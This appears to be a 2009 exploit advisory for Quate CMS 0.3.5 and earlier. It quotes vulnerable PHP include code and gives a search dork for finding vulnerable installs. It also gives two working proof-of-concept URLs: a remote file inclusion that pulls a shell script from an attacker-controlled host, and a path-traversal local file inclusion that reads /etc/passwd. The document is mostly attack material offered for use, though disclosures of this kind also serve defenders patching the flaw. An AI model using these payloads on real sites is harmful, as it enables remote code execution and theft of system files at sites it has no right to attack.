[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability
#Download Script : http://quate.net/quatecms
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)
# <?php
# if ($bypass_restrict != 1) {
# require_once($secure_page_path. "includes/secure.php");
# }
# ?>
#PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???
#
#
#########################################################################
#
#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)
# <?PHP
# if ($not_logged_in != 1) {
# if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
# require_once("themes/" .$row_secure['account_theme']. "/footer.php");
# ?>
#PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]